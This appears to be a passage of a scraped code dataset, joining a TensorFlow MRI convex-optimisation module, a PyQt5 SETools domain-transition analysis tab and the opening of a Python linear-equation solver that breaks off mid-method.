order=_conjugate_exponent(self._order),\n scale=self._scale,\n dtype=self.dtype,\n name=f\"{self.name}_conj\")\n\n def _shape(self):\n return tf.TensorShape([self._domain_dimension_static])\n\n def _shape_tensor(self):\n return tf.convert_to_tensor(\n [self._domain_dimension_dynamic], dtype=tf.int32)\n\n\n@api_util.export(\"convex.ConvexFunctionIndicatorL1Ball\")\nclass ConvexFunctionIndicatorL1Ball(ConvexFunctionIndicatorBall): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` representing the indicator function of an L1 ball.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `tf.dtypes.DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(domain_dimension=domain_dimension, order=1,\n scale=scale, dtype=dtype, name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionIndicatorL2Ball\")\nclass ConvexFunctionIndicatorL2Ball(ConvexFunctionIndicatorBall): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` representing the indicator function of an L2 ball.\n\n Args:\n scale: A `float`. A scaling factor. Defaults to 1.0.\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n dtype: A `tf.dtypes.DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(domain_dimension=domain_dimension, order=2,\n scale=scale, dtype=dtype, name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionNorm\")\nclass ConvexFunctionNorm(ConvexFunction): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` computing the [scaled] Lp-norm of a [batch of] inputs.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n order: A `float`. The order of the norm. Supported values are `1`, `2`,\n `np.inf`.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `tf.dtypes.DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n order,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(scale=scale, dtype=dtype, name=name)\n self._order = check_util.validate_enum(order, [1, 2, np.inf], name='order')\n\n self._domain_dimension_static, self._domain_dimension_dynamic = (\n _get_static_and_dynamic_dimension(domain_dimension))\n\n def _call(self, x):\n return self._scale * tf.math.real(tf.norm(x, ord=self._order, axis=-1))\n\n def _prox(self, x, scale=None):\n combined_scale = self._scale\n if scale is not None:\n combined_scale *= tf.cast(scale, self.dtype.real_dtype)\n\n if self._order == 1:\n return math_ops.soft_threshold(x, combined_scale)\n if self._order == 2:\n return math_ops.block_soft_threshold(x, combined_scale)\n raise NotImplementedError(\n f\"The proximal operator of the L{self._order}-norm is not implemented.\")\n\n def _conj(self):\n # The convex conjugate of the Lp-norm is the indicator function on the unit\n # ball defined by the dual norm.\n return ConvexFunctionIndicatorBall(\n domain_dimension=self.domain_dimension,\n order=_conjugate_exponent(self._order),\n scale=self._scale,\n dtype=self.dtype,\n name=f\"{self.name}_conj\")\n\n def _shape(self):\n return tf.TensorShape([self._domain_dimension_static])\n\n def _shape_tensor(self):\n return tf.convert_to_tensor(\n [self._domain_dimension_dynamic], dtype=tf.int32)\n\n\n@api_util.export(\"convex.ConvexFunctionL1Norm\")\nclass ConvexFunctionL1Norm(ConvexFunctionNorm): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` computing the [scaled] L1-norm of a [batch of] inputs.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `tf.dtypes.DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(domain_dimension=domain_dimension, order=1,\n scale=scale, dtype=dtype, name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionL2Norm\")\nclass ConvexFunctionL2Norm(ConvexFunctionNorm): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` computing the [scaled] L2-norm of a [batch of] inputs.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `string` or `DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(domain_dimension=domain_dimension, order=2,\n scale=scale, dtype=dtype, name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionL2NormSquared\")\nclass ConvexFunctionL2NormSquared(ConvexFunction): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` computing the [scaled] squared L2-norm of an input.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `string` or `DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n\n References:\n .. [1] Parikh, N., & Boyd, S. (2014). Proximal algorithms. Foundations and\n Trends in optimization, 1(3), 127-239.\n \"\"\"\n def __init__(self,\n domain_dimension,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(domain_dimension=domain_dimension,\n scale=scale, dtype=dtype, name=name)\n\n def _call(self, x):\n return self._scale * tf.math.reduce_sum(x * tf.math.conj(x), axis=-1)\n\n def _prox(self, x, scale=None):\n combined_scale = self._scale\n if scale is not None:\n combined_scale *= tf.cast(scale, self.dtype.real_dtype)\n\n return math_ops.shrinkage(x, 2.0 * combined_scale)\n\n\n@api_util.export(\"convex.ConvexFunctionTikhonov\")\nclass ConvexFunctionTikhonov(ConvexFunctionAffineMappingComposition): # pylint: disable=abstract-method\n r\"\"\"A `ConvexFunction` representing a Tikhonov regularization term.\n\n For a given input :math:`x`, computes\n :math:`\\lambda \\left\\| T(x - x_0) \\right\\|_2^2`, where :math:`\\lambda` is a\n scaling factor, :math:`T` is any linear operator and :math:`x_0` is\n a prior estimate.\n\n Args:\n transform: A `tf.linalg.LinearOperator`. The Tikhonov operator :math:`T`.\n Defaults to the identity operator.\n prior: A `tf.Tensor`. The prior estimate :math:`x_0`. Defaults to 0.\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n scale: A `float`. The scaling factor.\n dtype: A `tf.DType`. The dtype of the inputs. Defaults to `float32`.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self,\n transform=None,\n prior=None,\n domain_dimension=None,\n scale=None,\n dtype=tf.float32,\n name=None):\n if domain_dimension is None and transform is not None:\n domain_dimension = transform.range_dimension\n function = ConvexFunctionL2NormSquared(domain_dimension=domain_dimension,\n scale=scale,\n dtype=dtype)\n # Stored only for external access. Not actually used for computation.\n self._transform = transform\n self._prior = prior\n # Convert to affine transform.\n operator = self._transform\n constant = self._prior\n if self._prior is not None:\n constant = tf.math.negative(constant)\n if operator is not None:\n constant = tf.linalg.matvec(operator, constant)\n super().__init__(function,\n operator=operator,\n constant=constant,\n name=name)\n\n @property\n def transform(self):\n return self._transform\n\n @property\n def prior(self):\n return self._prior\n\n\n@api_util.export(\"convex.ConvexFunctionTotalVariation\")\nclass ConvexFunctionTotalVariation(ConvexFunctionLinearOperatorComposition): # pylint: disable=abstract-method\n r\"\"\"A `ConvexFunction` representing a total variation regularization term.\n\n For a given input :math:`x`, computes :math:`\\lambda \\left\\| Dx \\right\\|_1`,\n where :math:`\\lambda` is a scaling factor and :math:`D` is the finite\n difference operator.\n\n Args:\n domain_shape: A 1D integer `tf.Tensor`. The shape of the domain. Defaults to\n `None`. The domain of this `ConvexFunction` may have multiple axes.\n axes: An `int` or a list of `ints`. The axes along which to compute the\n total variation. If `None` (default), the total variation is computed\n over all axes.\n scale: A `float`. A scaling factor.\n dtype: A `tf.DType`. The dtype of the inputs.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self,\n domain_shape,\n axes=None,\n scale=None,\n dtype=tf.float32,\n name=None):\n domain_shape_static, _ = (\n tensor_util.static_and_dynamic_shapes_from_shape(domain_shape))\n if axes is None:\n if domain_shape_static.rank is None:\n raise NotImplementedError(\n \"Rank of domain_shape must be known statically\")\n axes = list(range(domain_shape_static.rank))\n if isinstance(axes, int):\n axes = [axes]\n # `LinearOperatorFiniteDifference` operates along one axis only. So for\n # multiple axes, we create one operator for each axis and vertically stack\n # them.\n operators = [linalg_ops.LinearOperatorFiniteDifference(\n domain_shape, axis=axis, dtype=dtype) for axis in axes]\n operator = linalg_ext.LinearOperatorVerticalStack(operators)\n function = ConvexFunctionL1Norm(\n domain_dimension=operator.range_dimension_tensor(),\n scale=scale,\n dtype=dtype)\n super().__init__(function,\n operator=operator,\n name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionL1Wavelet\")\nclass ConvexFunctionL1Wavelet(ConvexFunctionLinearOperatorComposition): # pylint: disable=abstract-method\n r\"\"\"A `ConvexFunction` representing an L1 wavelet regularization term.\n\n For a given input :math:`x`, computes :math:`\\lambda \\left\\| Dx \\right\\|_1`,\n where :math:`\\lambda` is a scaling factor and :math:`D` is a wavelet\n decomposition operator (see `tfmri.linalg.LinearOperatorWavelet`).\n\n Args:\n domain_shape: A 1D integer `tf.Tensor`. The domain shape of this linear\n operator. This operator may have multiple domain dimensions.\n wavelet: A `str` or a `pywt.Wavelet`_, or a `list` thereof. When passed a\n `list`, different wavelets are applied along each axis in `axes`.\n mode: A `str`. The padding or signal extension mode. Must be one of the\n values supported by `tfmri.signal.wavedec`. Defaults to `'symmetric'`.\n level: An `int` >= 0. The decomposition level. If `None` (default),\n the maximum useful level of decomposition will be used (see\n `tfmri.signal.max_wavelet_level`).\n axes: A `list` of `int`. The axes over which the DWT is computed. Axes refer\n only to domain dimensions without regard for the batch dimensions.\n Defaults to `None` (all domain dimensions).\n scale: A `float`. A scaling factor.\n dtype: A `tf.dtypes.DType`. The dtype of the inputs.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self,\n domain_shape,\n wavelet,\n mode='symmetric',\n level=None,\n axes=None,\n scale=None,\n dtype=tf.dtypes.float32,\n name=None):\n operator = linalg_ops.LinearOperatorWavelet(domain_shape,\n wavelet,\n mode=mode,\n level=level,\n axes=axes,\n dtype=dtype)\n function = ConvexFunctionL1Norm(\n domain_dimension=operator.range_dimension_tensor(),\n scale=scale,\n dtype=dtype)\n super().__init__(function, operator, name=name)\n\n def _shape(self):\n return tf.TensorShape([self.operator.shape[-1]])\n\n def _shape_tensor(self):\n return tf.convert_to_tensor(\n [self.operator.shape_tensor()[-1]], dtype=tf.int32)\n\n\n@api_util.export(\"convex.ConvexFunctionQuadratic\")\nclass ConvexFunctionQuadratic(ConvexFunction): # pylint: disable=abstract-method\n r\"\"\"A `ConvexFunction` representing a generic quadratic function.\n\n Represents :math:`f(x) = \\frac{1}{2} x^{T} A x + b^{T} x + c`.\n\n Args:\n quadratic_coefficient: A `tf.Tensor` or a `tf.linalg.LinearOperator`\n representing a self-adjoint, positive definite matrix `A` with shape\n `[..., n, n]`. The coefficient of the quadratic term.\n linear_coefficient: A `tf.Tensor` representing a vector `b` with shape\n `[..., n]`. The coefficient of the linear term.\n constant_coefficient: A scalar `tf.Tensor` representing the constant term\n `c` with shape `[...]`.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self,\n quadratic_coefficient,\n linear_coefficient=None,\n constant_coefficient=None,\n scale=None,\n name=None):\n super().__init__(domain_dimension=quadratic_coefficient.shape[-1],\n scale=scale,\n dtype=quadratic_coefficient.dtype,\n name=name)\n self._quadratic_coefficient = quadratic_coefficient\n self._linear_coefficient = self._validate_linear_coefficient(\n linear_coefficient)\n self._constant_coefficient = self._validate_constant_coefficient(\n constant_coefficient)\n\n def _call(self, x):\n # Calculate the quadratic term.\n result = 0.5 * _dot(\n x, tf.linalg.matvec(self._quadratic_coefficient, x))\n # Add the linear term, if there is one.\n if self._linear_coefficient is not None:\n result += _dot(self._linear_coefficient, x)\n # Add the constant term, if there is one.\n if self._constant_coefficient is not None:\n result += self._constant_coefficient\n return self._scale * result\n\n def _prox(self, x, scale=None, solver_kwargs=None): # pylint: disable=arguments-differ\n combined_scale = self._scale\n if scale is not None:\n combined_scale *= tf.cast(scale, self.dtype.real_dtype)\n one_over_scale = tf.cast(1.0 / combined_scale, self.dtype)\n\n # Operator A^T A + 1 / \\lambda * I.\n self._operator = linalg_ext.LinearOperatorAddition([\n self._quadratic_coefficient,\n tf.linalg.LinearOperatorScaledIdentity(\n num_rows=self._quadratic_coefficient.domain_dimension,\n multiplier=one_over_scale)],\n is_self_adjoint=True,\n is_positive_definite=True)\n\n rhs = one_over_scale * x\n if self._linear_coefficient is not None:\n rhs -= self._linear_coefficient\n\n solver_kwargs = solver_kwargs or {}\n state = linalg_ops.conjugate_gradient(self._operator, rhs, **solver_kwargs)\n\n return state.x\n\n def _validate_linear_coefficient(self, coef): # pylint: disable=missing-param-doc\n \"\"\"Validates the linear coefficient.\"\"\"\n if coef.shape.rank is None:\n raise ValueError(\n \"Expected linear coefficient to have known rank, but found: %s in \"\n \"tensor %s\" % (coef.shape.rank, coef))\n if coef.shape.rank < 1:\n raise ValueError(\n \"Expected linear coefficient to have rank >= 1, but found: %s in \"\n \"tensor %s\" % (coef.shape.rank, coef))\n if not coef.shape[-1:].is_compatible_with([self._domain_dimension]):\n raise ValueError(\n \"Expected linear coefficient to have last dimension %d, but found: \"\n \"%d in tensor %s\" % (self._domain_dimension, coef.shape[-1], coef))\n if coef.dtype != self.dtype:\n raise ValueError(\n \"Expected linear coefficient to have dtype %s, but found: %s in \"\n \"tensor %s\" % (self.dtype, coef.dtype, coef))\n return coef\n\n def _validate_constant_coefficient(self, coef): # pylint: disable=missing-param-doc\n \"\"\"Validates the constant coefficient.\"\"\"\n if coef.dtype != self.dtype:\n raise ValueError(\n \"Expected constant coefficient to have dtype %s, but found: %s in \"\n \"tensor %s\" % (self.dtype, coef.dtype, coef))\n return coef\n\n def _shape(self):\n \"\"\"Returns the static shape of this `ConvexFunction`.\"\"\"\n batch_shape = array_ops.broadcast_static_shapes(\n self._quadratic_coefficient.shape[:-2],\n self._linear_coefficient.shape[:-1],\n self._constant_coefficient.shape)\n return batch_shape.concatenate(tf.TensorShape([self._domain_dimension]))\n\n def _shape_tensor(self):\n \"\"\"Returns the dynamic shape of this `ConvexFunction`.\"\"\"\n batch_shape_tensor = array_ops.broadcast_dynamic_shapes(\n tensor_util.object_shape(self._quadratic_coefficient)[:-2],\n tf.shape(self._linear_coefficient)[:-1],\n tf.shape(self._constant_coefficient))\n return tf.concat([batch_shape_tensor, [self._domain_dimension]], 0)\n\n @property\n def quadratic_coefficient(self):\n return self._quadratic_coefficient\n\n @property\n def linear_coefficient(self):\n return self._linear_coefficient\n\n @property\n def constant_coefficient(self):\n return self._constant_coefficient\n\n\n@api_util.export(\"convex.ConvexFunctionLeastSquares\")\nclass ConvexFunctionLeastSquares(ConvexFunctionQuadratic): # pylint: disable=abstract-method\n r\"\"\"A `ConvexFunction` representing a least squares function.\n\n Represents :math:`f(x) = \\frac{1}{2} {\\left \\| A x - b \\right \\|}_{2}^{2}`.\n\n Minimizing `f(x)` is equivalent to finding a solution to the linear system\n :math:`Ax - b`.\n\n Args:\n operator: A `tf.Tensor` or a `tfmri.linalg.LinearOperator` representing a\n matrix :math:`A` with shape `[..., m, n]`. The linear system operator.\n rhs: A `Tensor` representing a vector `b` with shape `[..., m]`. The\n right-hand side of the linear system.\n gram_operator: A `tf.Tensor` or a `tfmri.linalg.LinearOperator` representing\n the Gram matrix of `operator`. This may be used to provide a specialized\n implementation of the Gram matrix :math:`A^H A`. Defaults to `None`, in\n which case a naive implementation of the Gram matrix is derived from\n `operator`.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self, operator, rhs, gram_operator=None, scale=None, name=None):\n if isinstance(operator, linalg_imaging.LinalgImagingMixin):\n rhs = operator.flatten_range_shape(rhs)\n if gram_operator:\n quadratic_coefficient = gram_operator\n else:\n quadratic_coefficient = tf.linalg.LinearOperatorComposition(\n [operator.H, operator],\n is_self_adjoint=True, is_positive_definite=True)\n linear_coefficient = tf.math.negative(\n tf.linalg.matvec(operator, rhs, adjoint_a=True))\n constant_coefficient = tf.constant(0.0, dtype=operator.dtype)\n super().__init__(quadratic_coefficient=quadratic_coefficient,\n linear_coefficient=linear_coefficient,\n constant_coefficient=constant_coefficient,\n scale=scale,\n name=name)\n\n @property\n def operator(self):\n return self.quadratic_coefficient\n\n @property\n def rhs(self):\n return tf.math.negative(self.linear_coefficient)\n\n\ndef _dot(x, y):\n \"\"\"Returns the dot product of `x` and `y`.\"\"\"\n return tf.squeeze(\n tf.linalg.matvec(\n x[..., tf.newaxis],\n y, adjoint_a=True), axis=-1)\n\n\ndef _conjugate_exponent(exp):\n \"\"\"Returns the conjugate exponent of `exp`.\"\"\"\n if exp == 1.0:\n return np.inf\n if exp == np.inf:\n return 1.0\n return exp / (exp - 1.0)\n\n\ndef _get_static_and_dynamic_dimension(dim): # pylint: disable=missing-param-doc\n \"\"\"Returns the static and dynamic information from `dim`.\"\"\"\n # Get static dimension.\n dim_static = tf.get_static_value(dim)\n if dim_static is not None:\n if isinstance(dim_static, np.ndarray):\n try:\n dim_static = dim_static.item()\n except ValueError as err:\n raise ValueError(\n f\"domain_dimension must be a scalar integer, \"\n f\"but got: {dim_static} (type: {type(dim_static)})\") from err\n if isinstance(dim_static, (np.int32, np.int64)):\n dim_static = dim_static.item()\n if isinstance(dim_static, tf.compat.v1.Dimension):\n dim_static = dim_static.value\n if not isinstance(dim_static, int):\n raise ValueError(\n f\"domain_dimension must be a scalar integer, \"\n f\"but got: {dim_static} (type: {type(dim_static)})\")\n\n # Get dynamic dimension.\n dim_dynamic = tf.convert_to_tensor(dim, dtype=tf.int32)\n if dim_dynamic.shape.rank != 0:\n raise ValueError(\n f\"domain_dimension must be a scalar integer, \"\n f\"but got: {dim_dynamic} (type: {type(dim_dynamic)})\")\n\n return dim_static, dim_dynamic\n","repo_name":"mrphys/tensorflow-mri","sub_path":"tensorflow_mri/python/ops/convex_ops.py","file_name":"convex_ops.py","file_ext":"py","file_size_in_byte":35986,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"3"} +{"seq_id":"19204997403","text":"import logging\n\nfrom PyQt5.QtCore import pyqtSignal, Qt, QObject, QStringListModel, QThread\nfrom PyQt5.QtGui import QPalette, QTextCursor\nfrom PyQt5.QtWidgets import QCompleter, QHeaderView, QMessageBox, QProgressDialog, QScrollArea\nfrom setools import DomainTransitionAnalysis\n\nfrom .excludetypes import ExcludeTypes\nfrom ..widget import SEToolsWidget\n\n\nclass DomainTransitionAnalysisTab(SEToolsWidget, QScrollArea):\n\n \"\"\"A domain transition analysis tab.\"\"\"\n\n def __init__(self, parent, policy, perm_map):\n super(DomainTransitionAnalysisTab, self).__init__(parent)\n self.log = logging.getLogger(self.__class__.__name__)\n self.policy = policy\n self.query = DomainTransitionAnalysis(policy)\n self.setupUi()\n\n def __del__(self):\n self.thread.quit()\n self.thread.wait(5000)\n\n def setupUi(self):\n self.log.debug(\"Initializing UI.\")\n self.load_ui(\"dta.ui\")\n\n # set up source/target autocompletion\n type_completion_list = [str(t) for t in self.policy.types()]\n type_completer_model = QStringListModel(self)\n type_completer_model.setStringList(sorted(type_completion_list))\n self.type_completion = QCompleter()\n self.type_completion.setModel(type_completer_model)\n self.source.setCompleter(self.type_completion)\n self.target.setCompleter(self.type_completion)\n\n # setup indications of errors on source/target/default\n self.orig_palette = self.source.palette()\n self.error_palette = self.source.palette()\n self.error_palette.setColor(QPalette.Base, Qt.red)\n self.clear_source_error()\n self.clear_target_error()\n\n # set up processing thread\n self.thread = QThread()\n self.worker = ResultsUpdater(self.query)\n self.worker.moveToThread(self.thread)\n self.worker.raw_line.connect(self.raw_results.appendPlainText)\n self.worker.finished.connect(self.thread.quit)\n self.thread.started.connect(self.worker.update)\n self.thread.finished.connect(self.update_complete)\n\n # create a \"busy, please wait\" dialog\n self.busy = QProgressDialog(self)\n self.busy.setModal(True)\n self.busy.setLabelText(\"Processing analysis...\")\n self.busy.setRange(0, 0)\n self.busy.setMinimumDuration(0)\n self.busy.canceled.connect(self.thread.requestInterruption)\n\n # Ensure settings are consistent with the initial .ui state\n self.max_path_length.setEnabled(self.all_paths.isChecked())\n self.source.setEnabled(not self.flows_in.isChecked())\n self.target.setEnabled(not self.flows_out.isChecked())\n self.criteria_frame.setHidden(not self.criteria_expander.isChecked())\n self.results_frame.setHidden(not self.results_expander.isChecked())\n self.notes.setHidden(not self.notes_expander.isChecked())\n\n # connect signals\n self.buttonBox.clicked.connect(self.run)\n self.source.textEdited.connect(self.clear_source_error)\n self.source.editingFinished.connect(self.set_source)\n self.target.textEdited.connect(self.clear_target_error)\n self.target.editingFinished.connect(self.set_target)\n self.all_paths.toggled.connect(self.all_paths_toggled)\n self.flows_in.toggled.connect(self.flows_in_toggled)\n self.flows_out.toggled.connect(self.flows_out_toggled)\n self.reverse.stateChanged.connect(self.reverse_toggled)\n self.exclude_types.clicked.connect(self.choose_excluded_types)\n\n #\n # Analysis mode\n #\n def all_paths_toggled(self, value):\n self.max_path_length.setEnabled(value)\n\n def flows_in_toggled(self, value):\n self.source.setEnabled(not value)\n self.reverse.setEnabled(not value)\n\n if value:\n self.reverse_old = self.reverse.isChecked()\n self.reverse.setChecked(True)\n else:\n self.reverse.setChecked(self.reverse_old)\n\n def flows_out_toggled(self, value):\n self.target.setEnabled(not value)\n self.reverse.setEnabled(not value)\n\n if value:\n self.reverse_old = self.reverse.isChecked()\n self.reverse.setChecked(False)\n else:\n self.reverse.setChecked(self.reverse_old)\n\n #\n # Source criteria\n #\n\n def clear_source_error(self):\n self.source.setToolTip(\"The source domain of the analysis.\")\n self.source.setPalette(self.orig_palette)\n\n def set_source(self):\n try:\n # look up the type here, so invalid types can be caught immediately\n text = self.source.text()\n if text:\n self.query.source = self.policy.lookup_type(text)\n else:\n self.query.source = None\n except Exception as ex:\n self.source.setToolTip(\"Error: \" + str(ex))\n self.source.setPalette(self.error_palette)\n\n #\n # Target criteria\n #\n\n def clear_target_error(self):\n self.target.setToolTip(\"The target domain of the analysis.\")\n self.target.setPalette(self.orig_palette)\n\n def set_target(self):\n try:\n # look up the type here, so invalid types can be caught immediately\n text = self.target.text()\n if text:\n self.query.target = self.policy.lookup_type(text)\n else:\n self.query.target = None\n except Exception as ex:\n self.target.setToolTip(\"Error: \" + str(ex))\n self.target.setPalette(self.error_palette)\n\n #\n # Options\n #\n def choose_excluded_types(self):\n chooser = ExcludeTypes(self, self.policy)\n chooser.show()\n\n def reverse_toggled(self, value):\n self.query.reverse = value\n\n #\n # Results runner\n #\n\n def run(self, button):\n # right now there is only one button.\n for mode in [self.all_paths, self.all_shortest_paths, self.flows_in, self.flows_out]:\n if mode.isChecked():\n break\n\n self.query.mode = mode.objectName()\n self.query.max_path_len = self.max_path_length.value()\n self.query.limit = self.limit_paths.value()\n\n # start processing\n self.busy.show()\n self.raw_results.clear()\n self.thread.start()\n\n def update_complete(self):\n # update location of result display\n self.raw_results.moveCursor(QTextCursor.Start)\n\n self.busy.reset()\n\n\nclass ResultsUpdater(QObject):\n\n \"\"\"\n Thread for processing queries and updating result widgets.\n\n Parameters:\n query The query object\n model The model for the results\n\n Qt signals:\n finished The update has completed.\n raw_line (str) A string to be appended to the raw results.\n \"\"\"\n\n finished = pyqtSignal()\n raw_line = pyqtSignal(str)\n\n def __init__(self, query):\n super(ResultsUpdater, self).__init__()\n self.query = query\n\n def update(self):\n \"\"\"Run the query and update results.\"\"\"\n\n assert self.query.limit, \"Code doesn't currently handle unlimited (limit=0) paths.\"\n if self.query.mode == \"all_paths\":\n self.transitive(self.query.all_paths(self.query.source, self.query.target,\n self.query.max_path_len))\n elif self.query.mode == \"all_shortest_paths\":\n self.transitive(self.query.all_shortest_paths(self.query.source, self.query.target))\n elif self.query.mode == \"flows_out\":\n self.direct(self.query.transitions(self.query.source))\n else: # flows_in\n self.direct(self.query.transitions(self.query.target))\n\n self.finished.emit()\n\n def print_transition(self, trans):\n \"\"\"Raw rendering of a domain transition.\"\"\"\n\n if trans.transition:\n self.raw_line.emit(\"Domain transition rule(s):\")\n for t in trans.transition:\n self.raw_line.emit(str(t))\n\n if trans.setexec:\n self.raw_line.emit(\"\\nSet execution context rule(s):\")\n for s in trans.setexec:\n self.raw_line.emit(str(s))\n\n for entrypoint in trans.entrypoints:\n self.raw_line.emit(\"\\nEntrypoint {0}:\".format(entrypoint.name))\n\n self.raw_line.emit(\"\\tDomain entrypoint rule(s):\")\n for e in entrypoint.entrypoint:\n self.raw_line.emit(\"\\t{0}\".format(e))\n\n self.raw_line.emit(\"\\n\\tFile execute rule(s):\")\n for e in entrypoint.execute:\n self.raw_line.emit(\"\\t{0}\".format(e))\n\n if entrypoint.type_transition:\n self.raw_line.emit(\"\\n\\tType transition rule(s):\")\n for t in entrypoint.type_transition:\n self.raw_line.emit(\"\\t{0}\".format(t))\n\n self.raw_line.emit(\"\")\n\n if trans.dyntransition:\n self.raw_line.emit(\"Dynamic transition rule(s):\")\n for d in trans.dyntransition:\n self.raw_line.emit(str(d))\n\n self.raw_line.emit(\"\\nSet current process context rule(s):\")\n for s in trans.setcurrent:\n self.raw_line.emit(str(s))\n\n self.raw_line.emit(\"\")\n\n self.raw_line.emit(\"\")\n\n def transitive(self, paths):\n i = 0\n for i, path in enumerate(paths, start=1):\n self.raw_line.emit(\"Domain transition path {0}:\".format(i))\n\n for stepnum, step in enumerate(path, start=1):\n\n self.raw_line.emit(\"Step {0}: {1} -> {2}\\n\".format(stepnum, step.source,\n step.target))\n self.print_transition(step)\n\n if QThread.currentThread().isInterruptionRequested() or (i >= self.query.limit):\n break\n else:\n QThread.yieldCurrentThread()\n\n self.raw_line.emit(\"{0} domain transition path(s) found.\".format(i))\n\n def direct(self, transitions):\n i = 0\n for i, step in enumerate(transitions, start=1):\n self.raw_line.emit(\"Transition {0}: {1} -> {2}\\n\".format(i, step.source, step.target))\n self.print_transition(step)\n\n if QThread.currentThread().isInterruptionRequested() or (i >= self.query.limit):\n break\n else:\n QThread.yieldCurrentThread()\n\n self.raw_line.emit(\"{0} domain transition(s) found.\".format(i))\n","repo_name":"robcore/sedump","sub_path":"setoolsgui/apol/dta.py","file_name":"dta.py","file_ext":"py","file_size_in_byte":10503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"27019872425","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/1/30 12:06\n# @Author : Xingjh\n# @Email : xjh_0125@sina.com\n# @File : solve_equation.py\n# @Software: PyCharm\n\nimport re\nimport math\n\n\nclass Solution:\n def solveEquation(self, equation):\n \"\"\"\n 求解一个给定的方程,将x以字符串\"x=#value\"的形式返回。该方程仅包含'+',' - '操作,变量 x 和其对应系数。\n\n如果方程没有解,请返回“No solution”。\n\n如果方程有无限解,则返回“Infinite solutions”。\n\n如果方程中只有一个解,要保证返回值 x 是一个整数。\n :type equation: str\n :rtype: str\n \"\"\"\n result = ''\n li = equation.split('=')\n li_left = li[0]\n li_right = li[1]\n x_patt = re.compile('([+|-]*[\\d]*)x')\n d_patt = re.compile('([+|-]*[\\d]+)')\n x_left = x_patt.findall(li_left)\n tmp = re.sub(x_patt, '', li_left)\n d_left = d_patt.findall(tmp)\n # print(tmp, li_left, equation)\n x_right = x_patt.findall(li_right)\n tmp = re.sub(x_patt, '', li_right)\n d_right = d_patt.findall(tmp)\n # print(x_left, x_right, d_left, d_right, equation)\n # print(x_left, self.change(x_left), self.sum(self.change(x_left)))\n # print(x_right, self.change(x_right), self.sum(self.change(x_right)))\n # print(d_left, self.change(d_left), self.sum(self.change(d_left)))\n # print(d_right, self.change(d_right), self.sum(self.change(d_right)))\n x_total = self.sum(self.change(x_left)) - self.sum(self.change(x_right))\n d_total = self.sum(self.change(d_right)) - self.sum(self.change(d_left))\n # print(x_total, d_total, equation)\n if x_total == 0:\n if d_total == 0:\n result = 'Infinite solutions'\n else:\n result = 'No solution'\n else:\n if d_total == 0:\n result = 'x=0'\n else:\n result = 'x=' + str(round(d_total / x_total))\n print(equation)\n return result\n\n def change(self, li):\n result = []\n for i in li:\n if i == '' or i == '+':\n i = 1\n elif i == '-':\n i = -1\n result.append(int(i))\n return result\n\n def sum(self, li):\n result = 0\n for i in li:\n result += i\n return result\n\n def test(self):\n 